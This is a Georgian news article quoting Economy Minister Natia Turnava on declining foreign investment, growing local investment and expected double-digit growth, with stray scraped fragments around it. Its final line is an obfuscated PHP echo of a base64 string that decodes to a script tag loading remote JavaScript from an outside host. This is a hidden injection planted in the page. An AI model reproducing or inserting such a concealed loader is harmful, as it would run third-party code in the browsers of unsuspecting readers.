celsiusi
ავერსი შნაიდერი
საქართველო არის სტაბილურობის, სიმშვიდის და განვითარების კუნძული, - ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ნათია თურნავამ განაცხადა. ის დღეს პალიტრანიუსის გადაცემა „საქმეში“ იმყოფებოდა სტუმრად, სადაც პირდაპირი უცხოური ინვესტიციების შემცირებაზე ისაუბრა. თურნავას თქმით, ეს ნამდვილად გამოწვევაა და ინვესტიციები უნდა გავზარდოთ.
 
„ადგილობრივი ინვესტიციები იმიტომ იზრდება, რომ განცდა აქვს ჩვენს ბიზნესს, რომ პანდემიის მიუხედავად მომავალი არის დადებითი, ენდობა პოლიტიკას, ვითარებას, ვაქცინაციის მაღალ ტემპს და აინვესტირებს, რისი განცდაც არ ჰქონდათ სხვადასხვა ქვეყნის ინვესტორებს, რადგან ინვესტორები გახდნენ უფრო ფრთხილები, გამომდინარე გლობალური პრობლემებიდან.
 
თითოეულ კონკრეტულ ქვეყანასთან ინდივიდუალურად უნდა ვიმუშაოთ, რომ დავარწმუნოთ. საქართველო არის სტაბილურობის, სიმშვიდის და განვითარების კუნძული. კი ბატონო, რომელიმე სხვა ქვეყანაში შეიძლება არ ჩადოს ინვესტორმა ინვესტიცია, მაგრამ ჩვენთან წამოვიდეს. ამას სჭირდება ძალისხმევა და დრო. მართლაც რთულია პანდემიიდან მეორე წელს დაარწმუნო მასშტაბურად ინვესტორი, რომ საქართველოში წამოდი და ჩადე ფული. ბევრი დარგი პრობლემას შეეჯახა... მეტი მუშაობა გვმართებს“, - განაცხადა ნათია თურნავამ.
 
კითხვაზე, როდის ელოდება მინისტრი ინვესტორების გაააქტიურებას, თურნავამ უპასუხა, რომ შემდეგი წლიდან სავარაუდოდ უცხოური ინვესტიციების ჩადებაც გააქტიურდება.
 
„ვაპირებთ წელს დადებითი ტენდენცია ვაჩვენოთ სრულიად მსოფლიოს. ეს უკვე აისახა საერთაშორისო რეიტინგებში. თუკი მოვახერხებთ, რომ ორნიშნა ზრდის ტემპით დავასრულებთ ამ წელს, უფრო მეტი მატერიალური სადემონსტრაციო ფაქტი გვექნება, რომ საქართველო მიუხედავად პანდემიისა, სწრაფად აღდგა აგრძელებს რეგიონში ლიდერად ყოფნას ეკონომიკური ზრდის თვალსაზრისით“, - განაცხადა თურნავამ.
966
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");